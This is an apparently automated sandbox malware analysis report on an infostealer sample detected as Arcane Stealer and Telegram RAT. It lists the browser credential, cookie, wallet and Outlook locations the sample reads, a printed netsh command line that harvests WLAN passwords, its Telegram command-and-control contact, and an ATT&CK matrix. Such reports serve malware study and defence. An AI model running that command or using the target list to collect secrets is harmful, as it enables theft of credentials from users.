                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3 Wallet
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                        Tries to harvest and steal WLAN passwords
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldbJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.logJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Arcane Stealer
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting                        		Valid Accounts831
                        Windows Management Instrumentation                        		1
                        Scripting                        		11
                        Process Injection                        		62
                        Virtualization/Sandbox Evasion                        		1
                        OS Credential Dumping                        		931
                        Security Software Discovery                        		Remote Services1
                        Email Collection                        		1
                        Web Service                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		111
                        Disable or Modify Tools                        		LSASS Memory62
                        Virtualization/Sandbox Evasion                        		Remote Desktop Protocol1
                        Archive Collected Data                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                        Process Injection                        		Security Account Manager3
                        Process Discovery                        		SMB/Windows Admin Shares2
                        Data from Local System                        		1
                        Ingress Tool Transfer                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Obfuscated Files or Information                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object Model1
                        Clipboard Data                        		3
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Timestomp                        		LSA Secrets1
                        System Network Configuration Discovery                        		SSHKeylogging4
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading                        		Cached Domain Credentials2
                        File and Directory Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync134
                        System Information Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576963 Sample: zyEDYRU0jw.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 42 api.telegram.org 2->42 44 90.168.9.0.in-addr.arpa 2->44 46 icanhazip.com 2->46 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 60 6 other signatures 2->60 8 zyEDYRU0jw.exe 15 29 2->8         started        signatures3 58 Uses the Telegram API (likely for C&C communication) 42->58 process4 dnsIp5 48 api.telegram.org 149.154.167.220, 443, 49757 TELEGRAMRU United Kingdom 8->48 50 icanhazip.com 104.16.184.241, 49756, 80 CLOUDFLARENETUS United States 8->50 62 Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines) 8->62 64 Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines) 8->64 66 Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines) 8->66 68 11 other signatures 8->68 12 cmd.exe 1 8->12         started        15 cmd.exe 1 8->15         started        17 WerFault.exe 21 16 8->17         started        20 cmd.exe 1 8->20         started        signatures6 process7 file8 70 Uses netsh to modify the Windows network and firewall settings 12->70 72 Tries to harvest and steal WLAN passwords 12->72 22 tasklist.exe 1 12->22         started        24 conhost.exe 12->24         started        26 netsh.exe 2 15->26         started        28 conhost.exe 15->28         started        30 findstr.exe 1 15->30         started        32 chcp.com 1 15->32         started        40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->40 dropped 34 taskkill.exe 1 20->34         started        36 conhost.exe 20->36         started        38 2 other processes 20->38 signatures9 process10

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        zyEDYRU0jw.exe63%ReversingLabsByteCode-MSIL.Infostealer.Polazert
                        zyEDYRU0jw.exe100%AviraHEUR/AGEN.1307083
                        zyEDYRU0jw.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://mega.nz%https://roblox.com%https://cpanel.net0%Avira URL Cloudsafe
                        http://www.quovadis.bm00%Avira URL Cloudsafe
                        https://x.com-https://ads.google.com-https://pay.google.com0%Avira URL Cloudsafe
                        https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep0%Avira URL Cloudsafe
                        http://api.telegram.orgd0%Avira URL Cloudsafe
                        https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.0%Avira URL Cloudsafe
                        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high
                          icanhazip.com
                          		104.16.184.241
                          		truefalse
                            		high
                            90.168.9.0.in-addr.arpa
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://icanhazip.com/false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabzyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drfalse
                                  		high
                                  https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchzyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=tmp61E8.tmp.dat.0.drfalse
                                      		high
                                      https://x.com-https://ads.google.com-https://pay.google.comzyEDYRU0jw.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.telegram.orgzyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icozyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.drfalse
                                          		high
                                          https://api.telegram.org/botzyEDYRU0jw.exefalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp61E8.tmp.dat.0.drfalse
                                              		high
                                              https://support.google.com/chrome/?p=plugin_flashzyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.zyEDYRU0jw.exefalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.ecosia.org/newtab/zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drfalse
                                                  		high
                                                  http://icanhazip.com/0zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ac.ecosia.org/autocomplete?q=tmp61E8.tmp.dat.0.drfalse
                                                      		high
                                                      https://www.google.comzyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004417000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/images/branding/product/ico/googleg_alldp.icozyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drfalse
                                                          		high
                                                          https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.epzyEDYRU0jw.exefalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drfalse
                                                            		high
                                                            https://mega.nz%https://roblox.com%https://cpanel.netzyEDYRU0jw.exefalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ozon.ruzyEDYRU0jw.exefalse
                                                              		high
                                                              http://www.quovadis.bm0zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://api.telegram.orgdzyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://icanhazip.comzyEDYRU0jw.exefalse
                                                                		high
                                                                https://ocsp.quovadisoffshore.com0zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://api.telegram.orgzyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namezyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp61E8.tmp.dat.0.drfalse
                                                                      		high
                                                                      https://gemini.google.com/app?q=tmp61E8.tmp.dat.0.drfalse
                                                                        		high
                                                                        https://ipinfo.io/#zyEDYRU0jw.exefalse
                                                                          		high
                                                                          https://gmail.comzyEDYRU0jw.exefalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            149.154.167.220
                                                                            		api.telegram.orgUnited Kingdom
                                                                            		62041TELEGRAMRUfalse
                                                                            104.16.184.241
                                                                            		icanhazip.comUnited States
                                                                            		13335CLOUDFLARENETUSfalse

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1576963
                                                                            Start date and time:2024-12-17 19:52:30 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 6m 51s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                            Run name:Suspected VM Detection
                                                                            Number of analysed new started processes analysed:19
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:zyEDYRU0jw.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@25/18@3/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 48
                                                                            • Number of non-executed functions: 8
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.42.73.29, 40.126.29.9
                                                                            • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: zyEDYRU0jw.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            13:54:41API Interceptor61x Sleep call for process: zyEDYRU0jw.exe modified
                                                                            13:54:51API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            149.154.167.220ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                              87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              104.16.184.241itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                                                              • icanhazip.com/
                                                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                              • icanhazip.com/
                                                                                              7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                                              • icanhazip.com/
                                                                                              T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                                              • icanhazip.com/
                                                                                              VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                                              • icanhazip.com/
                                                                                              Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                              • icanhazip.com/
                                                                                              gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                                              • icanhazip.com/
                                                                                              uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                                                                              • icanhazip.com/
                                                                                              yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                              • icanhazip.com/

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              icanhazip.comitLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                                                              • 104.16.184.241
                                                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                              • 104.16.184.241
                                                                                              CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                              • 104.16.185.241
                                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                              • 104.16.185.241
                                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                              • 104.16.185.241
                                                                                              7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.16.184.241
                                                                                              iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                                                              • 104.16.185.241
                                                                                              T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.16.184.241
                                                                                              3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.16.185.241
                                                                                              api.telegram.orgugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TELEGRAMRUSetup.msiGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              CLOUDFLARENETUShngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              http://kmaybelsrka.sbs:6793/bab.zipGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.64.41.3
                                                                                              https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                              • 162.159.61.3
                                                                                              CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.2.110
                                                                                              Documento_Contrato_Seguro_18951492.msiGet hashmaliciousAteraAgentBrowse
                                                                                              • 104.18.21.76
                                                                                              Documento_Contrato_Seguro_25105476.msiGet hashmaliciousAteraAgentBrowse
                                                                                              • 104.18.21.76
                                                                                              http://sharefileon.comGet hashmaliciousUnknownBrowse
                                                                                              • 104.17.25.14
                                                                                              http://www.kukaj-to.chat/sedoGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.50.223

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 149.154.167.220
                                                                                              http://escrowmedifllc.hostconstructionapp.comGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                              • 149.154.167.220
                                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
